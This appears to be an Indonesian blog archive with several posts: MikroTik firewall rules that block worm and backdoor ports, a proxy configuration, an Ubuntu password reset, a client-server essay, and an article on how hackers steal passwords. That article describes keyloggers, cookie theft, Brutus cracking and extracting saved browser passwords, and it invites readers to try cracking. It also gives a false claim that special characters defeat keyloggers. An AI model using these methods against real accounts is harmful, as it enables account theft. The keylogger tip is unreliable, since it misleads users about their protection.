Selanjutnya, kita akan mem-filter dan melakukan DROP pada paket-paket yang kelihatannya berasal dari HOST yang terinfeksi Virus.
Daripada kita menambah rule-rule dibawah ke forward chain, yang berakibat chain forward terlalu penuh dengan rule sehingga sulit melakukan troubleshooting. Kita dapat menambah chain tersendiri, dan dapat diberi nama Virus. Dan rule-rule dibawah kita masukkan ke chain tersebut.
Code:
add chain=virus protocol=tcp dst-port=135-139 action=drop comment="Drop Blaster Worm"

add chain=virus protocol=udp dst-port=135-139 action=drop comment="Drop Messenger Worm"

add chain=virus protocol=tcp dst-port=445 action=drop comment="Drop Blaster Worm"

add chain=virus protocol=udp dst-port=445 action=drop comment="Drop Blaster Worm"

add chain=virus protocol=tcp dst-port=593 action=drop comment="________"

add chain=virus protocol=tcp dst-port=1024-1030 action=drop comment="________"

add chain=virus protocol=tcp dst-port=1080 action=drop comment="Drop MyDoom"

add chain=virus protocol=tcp dst-port=1214 action=drop comment="________"

add chain=virus protocol=tcp dst-port=1363 action=drop comment="ndm requester"

add chain=virus protocol=tcp dst-port=1364 action=drop comment="ndm server"

add chain=virus protocol=tcp dst-port=1368 action=drop comment="screen cast"

add chain=virus protocol=tcp dst-port=1373 action=drop comment="hromgrafx"

add chain=virus protocol=tcp dst-port=1377 action=drop comment="cichlid"

add chain=virus protocol=tcp dst-port=1433-1434 action=drop comment="Worm"

add chain=virus protocol=tcp dst-port=2745 action=drop comment="Bagle Virus"

add chain=virus protocol=tcp dst-port=2283 action=drop comment="Drop Dumaru.Y"

add chain=virus protocol=tcp dst-port=2535 action=drop comment="Drop Beagle"

add chain=virus protocol=tcp dst-port=2745 action=drop comment="Drop Beagle.C-K"

add chain=virus protocol=tcp dst-port=3127-3128 action=drop comment="Drop MyDoom"

add chain=virus protocol=tcp dst-port=3410 action=drop comment="Drop Backdoor OptixPro"

add chain=virus protocol=tcp dst-port=4444 action=drop comment="Worm"

add chain=virus protocol=udp dst-port=4444 action=drop comment="Worm"

add chain=virus protocol=tcp dst-port=5554 action=drop comment="Drop Sasser"

add chain=virus protocol=tcp dst-port=8866 action=drop comment="Drop Beagle.B"

add chain=virus protocol=tcp dst-port=9898 action=drop comment="Drop Dabber.A-B"

add chain=virus protocol=tcp dst-port=10000 action=drop comment="Drop Dumaru.Y"

add chain=virus protocol=tcp dst-port=10080 action=drop comment="Drop MyDoom.B"

add chain=virus protocol=tcp dst-port=12345 action=drop comment="Drop NetBus"

add chain=virus protocol=tcp dst-port=17300 action=drop comment="Drop Kuang2"

add chain=virus protocol=tcp dst-port=27374 action=drop comment="Drop SubSeven"

add chain=virus protocol=tcp dst-port=65506 action=drop comment="Drop PhatBot, Agobot, Gaobot"
Here, we list all those well known “bad” protocols and ports, used by various trojans and viruses when they take over your computer. This list is incomplete; we should add more rules to it! We can jump to this list from the forward chain by using a rule with action=jump:
Diatas kita telah dapatkan daftar rule untuk memfilter paket-paket dari protocol dan posrt yang merupakan berasal dari Virus ataupun Trojan. Daftar diatas belum komplit, kita bisa mendapatkan rule-rule tambahan dari berbagai sumber, tapi setidaknya rule diatas dapat menjadi awal.
Agar paket dari chain forward dapat menuju ke chain virus kita dapat menererapkan action=jump, seperti rule dibawah ini :
Code:
add chain=forward action=jump jump-target=virus comment="jump to the virus chain"
Chain Forward kita akan nampak seperti dibawah ini :
This image has been resized. Click this bar to view the full image. The original image is sized 701×243.

Bila paket yang ter-jump ke chain virus tidak ter-filter, maka paket tersebut akan dikembalikan ke chain forward.
Kita dapat dengan mudah menambahkan rule yang membolehkan udp dan ping dan drop yang lainnnya (jika tidak ada service pada network user yang perlu diakses dari network luar) :
Code:
add chain=forward protocol=icmp comment="allow ping"

add chain=forward protocol=udp comment="allow udp"

add chain=forward action=drop comment="drop everything else"
Demikian tutorial ini, semoga bermanfaat bagi kita semua..
Referensi : forummikrotik.com

Mambangun Transparant Proxy di Mikrotik

[admin@PROXY] > ip proxy print
enabled: no
port: 3128
parent-proxy: 0.0.0.0:1
maximal-client-connecions: 1000
maximal-server-connectons: 1000
=====================================
[admin@PROXY] > ip web-proxy print
enabled: yes
src-address: 0.0.0.0
port: 8080
hostname: “PROXY”
transparent-proxy: yes
parent-proxy: 0.0.0.0:0
cache-administrator: “support@andalaswave.net”
max-object-size: 128000KiB
cache-drive: system
max-cache-size: unlimited
max-ram-cache-size: unlimited
status: running
reserved-for-cache: 30736384KiB
reserved-for-ram-cache: 2048KiB
========================================
[admin@PROXY] > ip firewall nat print
Flags: X – disabled, I – invalid, D – dynamic
0   chain=srcnat out-interface=public action=masquerade
1   chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080
2   chain=dstnat protocol=tcp dst-port=3128 action=redirect to-ports=8080
3   chain=dstnat protocol=tcp dst-port=8000 action=redirect to-ports=8080
4   chain=dstnat protocol=tcp dst-port=8080 action=redirect to-ports=8080
[admin@PROXY] >
======================================================
[admin@PROXY] > ip firewall filter print
Flags: X – disabled, I – invalid, D – dynamic
0   chain=input in-interface=public protocol=tcp dst-port=8080 action=drop
[admin@PROXY] >
====================================================
[admin@PROXY] > ip route print
Flags: X – disabled, A – active, D – dynamic,
C – connect, S – static, r – rip, b – bgp, o – ospf
#     DST-ADDRESS        PREF-SRC        G GATEWAY         DISTANCE INTERFACE
0 ADC 192.168.0.0/26     192.168.0.1                                local
1 ADC 202.152.61.112/29  202.152.61.114                         public
2 A S ;;; added by setup
0.0.0.0/0                          r 202.152.61.113              public
=======================================================
admin@PROXY] > ip pool print
# NAME                                         RANGES
0 dhcp_pool1                                   192.168.0.2-192.168.0.62
======================================================================
[admin@PROXY] > ip service print
Flags: X – disabled, I – invalid
#   NAME                                  PORT  ADDRESS            CERTIFICATE
0 X telnet                                23    0.0.0.0/0
1 X ftp                                    21    0.0.0.0/0
2   www                                  80    0.0.0.0/32
3   ssh                                    22    0.0.0.0/0
4 X www-ssl                            443   0.0.0.0/0                none
[admin@PROXY] >
=================================================
[admin@PROXY] > ip firewall address-list print
Flags: X – disabled, D – dynamic
#   LIST       ADDRESS
0   laptop     192.168.0.62
[admin@PROXY] >

Reset Password Ubuntu

Lama bergelut dengan Labtop Toshiba SatteliteA135 Series yang udah pake Ubuntu 7.10 Ultimate edition malah kelupaan password PC di Kantor. Terakhir PC di kantor di Install Ubuntu 7.04 sekitar akhir Januari lalu. Karena ada File yang tertinggal di sana akhirnya Kompie PC nya dinyalakan juga …tapi sewaktu login dan mengetikkan password nggak pernah cocok. Semua kombinasi password yang pernah dipake sudah dicoba tapi sia-sia. Jalan terakhir direset passwordnya. Restart Ubuntunya kemudian di menu GRUB masuk ke sistem dengan recovery mode. Recovery mode menjalankan Linux dengan user root. Root merupakan user yang mempunyai hak akses penuh terhadap sistem. Kemudian ketikkan perintah seperti dibawah ini :
PLAIN TEXT
root@root:~# passwd charter
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

Perintah di atas dipakai untuk mereset password dari user root (sesuaikan dengan username Anda). Setelah itu sekarang saatnya untuk merestart komputer. Ketikkan:
PLAIN TEXT
root@root:~# reboot

Sekarang jalankan Ubuntunya dengan normal bukan recovery mode lagi dengan password baru yang telah di buat tadi.

Konsep Sistem Client-Server

Pendahuluan
Diawal perkembangannya perangkat komputer adalah barang yang mahal dan mewah. Pengembangan dan pengoperasiannya rumit dan terpusat. Namun seiring dengan berjalannya waktu yang tadinya proses tersentralisasi dikembangakan menjadi proses terdistribusi sampai pada end user. Hal ini sangat dipengaruhi oleh adanya perkembangan teknologi LAN (Local Area Network) di pertengahan tahun 1980 an. Dengan LAN sebuah PC dapat melakukan komunikasi satu dengan lainnya dan dapat saling berbagi resource baik perangkat keras ataupun database. LAN mampu memberikan interkonektivitas yang tidak pernah ada sebelumnya. Untuk dapat melakukan hal tersebut dibutuhkan sebuah komputer pemproses yang memfasilitasi dan melayani proses sharing semua resource yang ada. Perangkat ini disebut dengan Server. Untuk melakukan Sharing File biasanya dibutuhkan sebuah File Server begitu juga untuk sharing Printer dibutuhkan sebuah Printer Server. Namun ternyata hal seperti ini belumlah cukup. Jumlah PC yang bertambah dengan sangat cepat seiring dengan berkembangnya sebuah organisasi. Jumlah end user dan client juga bertambah banyak. Kebutuhan akan perangkat menjadi bertambah pula, tidak hanya membutuhkan sebuah printer server, juga dibutuhkan server-server lainnya seperti server pengolahan gambar, server pengolahan suara, dan lainnya. Server-server ini dengan database dan applikasinya harus dapat diakses oleh beberapa PC, ataupun diakses oleh sebuah komputer mainframe melalui sebuah LAN. Sistem seperti ini disebut Sistem Client Server seperti digambarkan pada Gambar 1 dibawah ini.
Gambar 1. Skema Sistem Client-Server
Komponen dan Fungsi Sistem Client Server
Gambaran umum konfigurasi Client Server diperlihatkan pada gambar 2. Dengan pendekatan Client Server setiap PC dapat melakukan secara independen sebuah pemrosesan lokal dan mensharing perangkat enterprise melalui LAN. Untuk kasus yang lebih luas kemampuan akses dapat dilakukan melalui MAN (Metropolita Area Network) atau WAN (Wide Area Network). Sebuah database dan program applikasi enterprise misalnya diletakan pada sebuah server dimana setiap end user dapat melakukan akses melalui Client Processor, LAN dan Server seperti pada gambar 3.
Gambar-2 Host Sistem dan Sistem Client Server
User
User disini adalah end user yang mengakses client untuk mendapatkan sebuah layanan. End user bisa saja seorang manager perusahaan, professional, karyawan di sebuah perusahaan, atau pelanggan. Ada timbul sedikit kerancuan. Pelanggan dalam sebuah bisnis atau perdagangan disebut dengan client, tapi client ini adalah manusia, jangan dibingungkan dengan istilah client pada pemrosesan komputer. Dapat kita katakan sebuah user atau end user adalah ketika melakukan proses akhir menggunakan sistem client server.
Gambar 3. Komponen Sistem Client Server
Client
Client dapat berupa sebuah pemproses yang powerful atau dapat juga berupa terminal tua dengan kemampuan proses yang terbatas. Secara mendasar client adalah sebuah PC dengan sistem operasinya sendiri. Sebagian besar pemrosesan banyak dilakukan di sebuah server dimana bagian-bagian dalam lingkup pekerjaannya ditentukan oleh program komputer, inilah yang menyebabkan sistem client server berbeda dengan sistem transaksi tradisional. Sistem client server memungkinkan sebuah teknologi dan applikasinya digunakan bersamaan. Applikasi disini termasuk didalamnya adalah pemroses pesan seperti e-mail, pemproses file lokal seperti DBMS untuk browsing dan penghitungan, atau sharing resource seperti sistem image processing, sistem optical character, sistem advance grafic processing, plotter warna, atau sebuah printer. Perangkat-perangkat ini bisa saja berasal dari berbagai vendor yang ada. Untuk memfasilitasi query pemprosesan dari client, sebagian besar sistem client server menggunkaan Structured Query Language (SQL) yang merupakan struktur bahasa tingkat tinggi. SQL dengan database relationalnya adalah standar de facto untuk hampir sebagian besar sistem client server. Salah satu komponen terpenting sistem client server adalah User Interface (UI), yang digunakan user untuk berkomunikasi. Bagi user yang seorang programmer, UI tidak mesti user friendly, tapi untuk end user yang bukan programmer sangat dibutuhkan UI yang user friendly. Dibutuhkan Graphical User Interface (GUI) untuk end user karena GUI menampilkan grafis untuk melakukan akses dengan icon-icon tanpa perlu memasukan perintah pemrograman. Kedepannya GUI tidak hanya digunakan untuk menggantikan akses perintah pemprograman tapi juga digunakan untuk grafik, voice, video, animasi, untuk selanjutnya menjadi sebuah teminal multimedia.
Network dan Transmisi
Server dan client dapat terkoneksi dengan sebuah media transmisi. Media transmisi ini dapat berupa kabel, wireless, atau fiber. Dengan media ini memungkinkan sebuah perusahaan untuk melakukan enterprice network lebih besar dalam sebuah workgroup atau departemen. Untuk itu dibutuhkan interoperability sebagai contoh operasi dan pertukaran informasi yang heterogen melalui berbagai perangkat software dalam jaringan. Esensinya adalah keterbukaan dalam melakukan pertukaran baik komponen dan software yang berasal dari vendor yang berbeda-beda. Dengan interoperability baik vendor dan customer akan mendapatkan keuntungan.
Interoperability memberikan dampak pada arsitektur jaringan. Awal sebuah arsitektur jaringan adalah SNA namun arsitektur ini bersifar proprietary dan tidak terbuka dengan vendor lainnya. Kemudian sebagian besar orang beralih ke OSI yang di standarkan oleh ISO (International Standards Organization). OSI banyak di gunakan di Eropa namun kurang berkembang di Amerika Serikat. Di Amerika Serikat muncul TCP/IP yang kemudian di dukung oleh Unix User Group.
Servers
Konektivitas adalah hal yang terpenting namun bukan satu-satunya faktor untuk mendapatkan efisiensi dan efektivitas sharing resource yang dimiliki. Dibutuhkan sebuah perangkat yang memiliki kemampuan mengontrol software, menjalankan program applikasi, dan mengakses database dengan mudah dan cepat. Untuk itulah diperlukan sebuah Server. Sebuah Server harus mendukung spesifikasi yang mendukung resource sharing seperti Network Server Operating System, Multiple User Interface, GUI (Graphic User Interface), dialog oriented cleint – server languange seperti SQL dan database arsitektur. Saat ini resuorce bisa tersebar secara spasial tidak hanya berada dalam batasan sebuah negara namun sudah antar negara yang membutuhkan interkoneksi yang tinggi.
Beberapa software dapat diperoleh dari vendor atau software house. Software tersebut bisa bersifat mainframe centric (sentral) atau PC server centric. Namun selain semua hal yang tersedia pada paket software tersebut tetap dibutuhkan in house sofware development. Juga perlu untuk mengintegrasikan sistem client server dengan sistem informasi yang telah ada dan menggunakan sistem tersebut tidak hanya sebagai end user tapi juga bekerja diantara group end user.
Server melakukan pemprosesan mirip dengan pemrosesan yang ada disisi client. Namun ada sedikit perbedaan, biasanya sebuah server tidak mempunyai User Interface karena didesain untuk networking, memproses database dan memproses applikasi. Pembeda antara pemrosesan client dan server ada pada tanggungjawab dan fungsi dari pemrosesan yang dilakukan. Sebagai contoh sebuah server dapat bertindak sebagai repository dan penyimpanan informasi dalam kasus pada file server. Tipe dari Server tergantung pada kebutuhan dan tujuan sistem. Dalam beberapa kasus sebuah server harus mampu melakukan multitaskting (membentuk multi fungsi secara simultan), menggunakan multiple operating system, lebih portable, memiliki skalabilitas, dan memiliki waktu respon yang cepat untuk melakukan teleprosesing. Dengan kapabilitas seperti itu menjadikan server memiliki harga yang relatif mahal. Penyebab mahalnya harga server adalah :
  1. Network Management
  2. Gateway function termasuk akses keluar dan e-mail publik
  3. Penyimpanan
  4. File Sharing
  5. Batch processing
  6. Bulletin Board access
  7. Facsimile transmission
Pemrosesan Database
Beberapa prinsip pemrosesan data pada server termasuk didalamnya adalah integritas, sekuriti, dan recovery data. Enterprise data yang dibutuhkan oleh sebuah perusahaan membutuhkan sebuah integrasi, pengaksesan data yang di kendalikan dan kelola dengan securiti yang baik, dan recovery data dapat dilakukan jika terjadi kegagalan sistem.
Beberapa data management dilakukan secara otomatis. Biasanya dilakukan oleh DBMS yang berada di Server yang mengontrol akses diantara pemprosesan multiple sistem dan mengintegrasikan akses data melalui network management.
Pemrosesan Applikasi
Data digunakan oleh program applikasi yang mana sebagian besarnya berada di server. Ada beberapa applikasi client server yang disediakan oleh vendor. Tools applikasi ini menjadikan pengembangan sistem client-server menjadi lebih kompetitif. Pengembangan applikasi client-server dapat dilakukan dengan beberapa cara yakni :
  1. Fungsi pemprosesan didistribusikan diantara client dan server. Porsi dari client dijalankan oleh end user dengan menggunakan bahasa pemrograman database seperti SQL yang memberikan semacam request data dan kemudian mengekstrak data tersebut dari lokasinya dimana semua proses tersebut dikontrol oleh sistem operasi.
  2. UI dan GUI menjadi lebih sering digunakan karena tingkat kemudahan penggunaan menjadi lebih penting.
  3. Digunakannya Advance networking seperti LAN
  4. Code generator juga digunakan, Metodelogi Objeck Oriented akan menambah tingkat penggunan.
  5. Tools pengembangan seperti SQL Server, FLOWMARK, Progress, ObjectView, Oracle menjadi sangat diperlukan
Ketika sebuah applikasi diproses dan permintaan akan data dilakukan oleh client, maka hasilnya dikirimkan melalui LAN. Hasil dari applikasi tersebut dapat saja dilakukan perubahan bentuk untuk mendapatkan tampilan yang lebih baik. Semuanya ini dilakukan di sisi client oleh end user melalui UI (User Interface). Diagram skematik pendekatan client server ditunjukan pada gambar 4.
Gambar 4- Applikasi Sistem Client Server
Keuntungan Sistem Client Server
  1. Mengurangi tanggung jawab dan biaya overhead
  2. Kontrol biaya operasional dan pengembangan yang lebih mudah
  3. Waktu respon yang lebih baik dalam pemrosesan.
  4. Akses data yang lebih besar bagi perusahaan. Sistem Client server mengamankan transaksi data dan menyimpannya pada server untuk kemudian dapat di sharing, dimanipulasi, dianalisa secara lokal.
  5. Memungkinkan pendistribusian proses dari tersentralisasi menjadi desktop computing
  6. Menawarkan kooperatif prosesing antara individu dan group antar departemen, geografis dan zona waktu.
  7. Rewriting software pada sistem client server memberikan keuntungan untuk mendapatkan sistem yang terintegrasi dan memberikan efisiensi.
  8. Menawarkan friendlu interface pada end user khususnya pada knowledge worker dan customer.
  9. Keterlibatan yang lebih untuk end user pada implementasi IT.
  10. Arsitektur terbuka dan sistem terbuka memberikan fleksibilitas dalam memilih konfigurasi hardware yang berbeda, network, dan DBMS dari berbagai vendor.
Hambatan Implementasi Sistem Client Server
Organisasi
  1. Skill personel yang kurang memadai untuk implementasi sistem client server.
  2. Anti perubahan terhadap teknologi baru.
  3. Biaya konversi
  4. Membutuhkan koordinasi dan kontrol yang lebih pada end user.
Teknologi
  1. Membutuhkan infrastruktur LAN dan WAN
  2. Skill dan peralatan yang belum memadai
  3. Belum adanya pemahaman dan pengalaman dalam merencanakan sistem client server
  4. Tidak tersedianya produk dan tools pengembangan sistem client server
  5. Sedikitnya applikasi client server
  6. Sedikitnya standar nasional dan internasional untuk sistem client server.
Artikel ini Disadur dari : The Client Server Paradigm, Bill Foy, Vice President of Micro Systems, 1998

Cara Hackers Mendapatkan Password

Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para newbie yang terus saja bertanya-tanya.. “Bagaimana cara mendapatkan password email orang lain?” atau pertanyaan yang paling sering saya terima ialah.. “Bagaimana cara anda mendapatkan password saya?” :P
Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga account saat berada di tempat-tempat rawan.
Bagaimana Mendapatkannya?
Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan paling sering digunakan:
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur
Browser
[9]. Googling
[1]. Social Engineering
Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai “penipuan” :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban.
Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban.
Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.
Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.
[2]. KeyLogger
KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form password misalnya.
Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.
2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.
[3]. Web Spoofing
Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan.
Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.
[4]. Menghadang Email
Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh.
Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).
[5]. Password Cracking
“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari – hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special.
Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.
Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute – force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter.
Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil.
Jika anda ingin melakukan password Cracking, silahkan pilih – pilih sendiri aplikasinya di halaman Member – spyrozone.tk.
[6]. Session Hjacking
Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya.
Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies.
Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP.
Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:
1. Jangan menggunakan browser Internet Explorer
Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
2. Periksa Source CODEnya
Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :
“HACKED”, “DEFACED”, “OWNED”.. dll..
Jika ragu-ragu……. reject ajah..
3. LogOUT tiba-tiba.
Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.
Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:
1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi
client side.
Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.
[7]. Menjadi Proxy Server
Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.
[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur
browser
Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.
Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.tk  ;) Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidak perlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live.
Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung.
Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan.
Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options —> Settings
Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda.
Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll. Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.
Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu.
Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools —> Options —> Security –> Saved password.
Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”.
Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya ;D (It’s fun enough.. ;)
Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!
[9]. Googling
Google.com. Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;) Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas ;D
Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman bermain” anda akan diambil alih olehnya..